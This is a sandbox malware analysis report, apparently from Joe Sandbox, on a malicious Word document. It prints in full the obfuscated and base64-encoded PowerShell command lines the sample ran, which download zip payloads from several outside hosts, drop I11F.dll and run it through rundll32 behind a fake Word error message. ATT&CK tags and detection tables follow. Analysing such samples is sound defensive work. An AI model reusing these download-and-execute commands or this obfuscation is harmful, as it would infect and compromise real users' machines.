Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SeT-itEm vaRIaBlE:w2HC ([tyPE]("{0}{2}{3}{1}" -f'sySt','rECtoRy','eM.io.','Di') ) ; sEt-item ("VAria"+"ble:"+"s"+"9n6") ( [type]("{4}{0}{7}{5}{8}{3}{6}{2}{1}"-f 'sTEm.n','ER','nag','ic','Sy','.','EPoiNtma','ET','Serv') ); $Rze8ms1=$L_7F + [char](64) + $Z40J;$U51B=(('I'+'86')+'Y'); $w2hC::"crEat`eDi`RectO`Ry"($HOME + (('Fp'+('fL'+'x8')+('o'+'0s'+'zFp')+('fGzta'+'zk')+('lF'+'p')+'f')-rEplaCE ('F'+'pf'),[ChAr]92));$Q81B=('X'+('4'+'_V')); $S9N6::"sEcur`i`TYpRo`TOcOL" = ('T'+('l'+'s12'));$P55L=(('I'+'_6')+'F');$Olvvwn6 = (('I'+'11')+'F');$I82O=('I'+('34'+'R'));$Uo7olue=$HOME+((('cH'+'q')+('Lx8'+'o'+'0s')+('zcH'+'q')+('Gzt'+'az')+('k'+'lcHq')) -ReplACE ([CHaR]99+[CHaR]72+[CHaR]113),[CHaR]92)+$Olvvwn6+('.d'+'ll');$S_6P=('R'+('51'+'N'));$Gt0es1u=(('A]'+'['+'q[D')+':/'+('/m'+'ai')+('l.'+'k')+'yo'+'j'+'in'+('c'+'ond')+'ui'+'t'+'s.'+('com/j'+'hgu'+'n')+('75'+'3')+('.zip@A]['+'q[D'+'://')+'a'+('ccur'+'at'+'ebc')+('.gr'+'/e0lw'+'3t.z'+'i')+('p@'+'A]')+'[q'+('[D'+':')+('//tu'+'mk')+('uv.o'+'r')+('g.tr/'+'z'+'d8')+'dx'+('b2u'+'.zi'+'p')+'@'+('A'+'][')+'q['+'D:'+'//'+'t'+'he'+('w'+'orldofjac'+'o'+'b.')+'c'+'om'+('/cjs'+'o')+('mlo'+'.zip@')+('A'+'][q')+'['+('D:/'+'/')+'e-'+('maco'+'m')+'.'+('c'+'om.')+('b'+'r/cl3')+'5'+('e0.zip'+'@A'+'][')+'q['+('D'+':/')+'/l'+('eg'+'i'+'on.s'+'er'+'iesn')+'ow'+('.we'+'b')+('sit'+'e')+'/q'+('3'+'3rv')+'2'+('.zi'+'p'))."re`pl`ACE"((('A]'+'[')+'q'+'[D'),([array](('d'+('s'+'ewf')),('w'+('evw'+'e'))),('ae'+'ff'),(('ht'+'t')+'p'))[2])."SPl`it"($K17P +
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery111Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting22Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsNative API1Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
Cloud AccountsExploitation for Client Execution3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaPowerShell3Rc.commonRc.commonScripting22Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 339433 Sample: Order.802796810.doc Startdate: 14/01/2021 Architecture: WINDOWS Score: 100 28 Found malware configuration 2->28 30 Antivirus detection for URL or domain 2->30 32 Multi AV Scanner detection for dropped file 2->32 34 11 other signatures 2->34 8 cmd.exe 2->8         started        11 WINWORD.EXE 293 27 2->11         started        process3 signatures4 36 Suspicious powershell command line found 8->36 38 Very long command line found 8->38 40 Encrypted powershell cmdline option found 8->40 13 powershell.exe 12 9 8->13         started        18 msg.exe 8->18         started        process5 dnsIp6 26 mail.kyojinconduits.com 198.54.126.36, 49167, 80 NAMECHEAP-NETUS United States 13->26 24 C:\Users\user\Lx8o0szbehaviorgraphztazkl\I11F.dll, PE32 13->24 dropped 42 Powershell drops PE file 13->42 20 rundll32.exe 13->20         started        file7 signatures8 process9 process10 22 rundll32.exe 20->22         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll100%Joe Sandbox ML
C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll43%ReversingLabsWin32.Trojan.MintZamg

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
mail.kyojinconduits.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://tumkuv.org.tr/zd8dxb2u.zip0%Avira URL Cloudsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://mail.kyojinconduits.com0%VirustotalBrowse
